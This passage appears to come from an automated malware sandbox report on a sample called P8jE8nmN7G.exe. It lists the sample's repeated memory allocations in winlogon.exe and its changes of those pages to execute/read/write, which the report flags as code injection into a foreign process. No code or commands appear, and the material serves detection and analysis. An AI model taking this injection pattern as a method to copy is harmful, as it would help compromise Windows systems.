Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D281000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D296000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D299000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D29B000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D2A0000 protect: page no access
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D2A0000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D2A1000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D2B6000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D2B9000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D2BB000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D2C0000 protect: page no access
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D2C0000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D2C1000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D2D6000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D2D9000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D2DB000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D2E0000 protect: page no access
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D2E0000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D2E1000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D2F6000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D2F9000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D2FB000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D300000 protect: page no access
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D300000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D301000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D316000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D319000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D31B000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D320000 protect: page no access
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D320000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D321000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D336000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D339000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D33B000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D340000 protect: page no access
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D340000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D341000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D356000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D359000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D35B000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D360000 protect: page no access
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D360000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D361000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D376000 protect: page read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory allocated: C:\Windows\System32\winlogon.exe base: D379000 protect: page read and write
Changes memory attributes in foreign processes to executable or writable
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory protected: C:\Windows\System32\winlogon.exe base: 400000 protect: page readonly
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory protected: C:\Windows\System32\winlogon.exe base: 401000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory protected: C:\Windows\System32\winlogon.exe base: 416000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory protected: C:\Windows\System32\winlogon.exe base: 419000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory protected: C:\Windows\System32\winlogon.exe base: 41B000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory protected: C:\Windows\System32\winlogon.exe base: C940000 protect: page readonly
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory protected: C:\Windows\System32\winlogon.exe base: C941000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory protected: C:\Windows\System32\winlogon.exe base: C956000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory protected: C:\Windows\System32\winlogon.exe base: C959000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory protected: C:\Windows\System32\winlogon.exe base: C95B000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory protected: C:\Windows\System32\winlogon.exe base: C960000 protect: page readonly
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory protected: C:\Windows\System32\winlogon.exe base: C961000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory protected: C:\Windows\System32\winlogon.exe base: C976000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory protected: C:\Windows\System32\winlogon.exe base: C979000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory protected: C:\Windows\System32\winlogon.exe base: C97B000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory protected: C:\Windows\System32\winlogon.exe base: C980000 protect: page readonly
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory protected: C:\Windows\System32\winlogon.exe base: C981000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory protected: C:\Windows\System32\winlogon.exe base: C996000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory protected: C:\Windows\System32\winlogon.exe base: C999000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory protected: C:\Windows\System32\winlogon.exe base: C99B000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory protected: C:\Windows\System32\winlogon.exe base: C9A0000 protect: page readonly
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory protected: C:\Windows\System32\winlogon.exe base: C9A1000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory protected: C:\Windows\System32\winlogon.exe base: C9B6000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory protected: C:\Windows\System32\winlogon.exe base: C9B9000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory protected: C:\Windows\System32\winlogon.exe base: C9BB000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory protected: C:\Windows\System32\winlogon.exe base: C9C0000 protect: page readonly
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory protected: C:\Windows\System32\winlogon.exe base: C9C1000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory protected: C:\Windows\System32\winlogon.exe base: C9D6000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory protected: C:\Windows\System32\winlogon.exe base: C9D9000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory protected: C:\Windows\System32\winlogon.exe base: C9DB000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory protected: C:\Windows\System32\winlogon.exe base: C9E0000 protect: page readonly
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory protected: C:\Windows\System32\winlogon.exe base: C9E1000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory protected: C:\Windows\System32\winlogon.exe base: C9F6000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory protected: C:\Windows\System32\winlogon.exe base: C9F9000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory protected: C:\Windows\System32\winlogon.exe base: C9FB000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory protected: C:\Windows\System32\winlogon.exe base: CA00000 protect: page readonly
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory protected: C:\Windows\System32\winlogon.exe base: CA01000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory protected: C:\Windows\System32\winlogon.exe base: CA16000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory protected: C:\Windows\System32\winlogon.exe base: CA19000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory protected: C:\Windows\System32\winlogon.exe base: CA1B000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory protected: C:\Windows\System32\winlogon.exe base: CA20000 protect: page readonly
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory protected: C:\Windows\System32\winlogon.exe base: CA21000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory protected: C:\Windows\System32\winlogon.exe base: CA36000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory protected: C:\Windows\System32\winlogon.exe base: CA39000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory protected: C:\Windows\System32\winlogon.exe base: CA3B000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory protected: C:\Windows\System32\winlogon.exe base: CA40000 protect: page readonly
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory protected: C:\Windows\System32\winlogon.exe base: CA41000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory protected: C:\Windows\System32\winlogon.exe base: CA56000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory protected: C:\Windows\System32\winlogon.exe base: CA59000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory protected: C:\Windows\System32\winlogon.exe base: CA5B000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory protected: C:\Windows\System32\winlogon.exe base: CA60000 protect: page readonly
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory protected: C:\Windows\System32\winlogon.exe base: CA61000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exe | Memory protected: C:\Windows\System32\winlogon.exe base: CA76000 protect: page execute and read and write
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CA79000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CA7B000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CA80000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CA81000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CA96000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CA99000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CA9B000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CAA0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CAA1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CAB6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CAB9000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CABB000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CAC0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CAC1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CAD6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CAD9000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CADB000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CAE0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CAE1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CAF6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CAF9000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CAFB000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB00000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB01000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB16000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB19000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB1B000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB20000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB21000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB36000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB39000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB3B000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB40000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB41000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB56000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB59000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB5B000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB60000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB61000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB76000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB79000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB7B000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB80000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB81000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB96000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB99000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CB9B000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CBA0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CBA1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CBB6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CBB9000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CBBB000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CBC0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CBC1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CBD6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CBD9000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CBDB000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CBE0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CBE1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CBF6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CBF9000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CBFB000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC00000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC01000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC16000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC19000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC1B000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC20000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC21000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC36000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC39000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC3B000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC40000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC41000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC56000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC59000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC5B000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC60000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC61000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC76000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC79000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC7B000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC80000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC81000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC96000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC99000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CC9B000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CCA0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CCA1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CCB6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CCB9000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CCBB000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CCC0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CCC1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CCD6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CCD9000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CCDB000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CCE0000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CCE1000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CCF6000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CCF9000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CCFB000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD00000 protect: page readonlyJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD01000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD16000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\P8jE8nmN7G.exeMemory protected: C:\Windows\System32\winlogon.exe base: CD19000 protect: page execute and read and writeJump to behavior
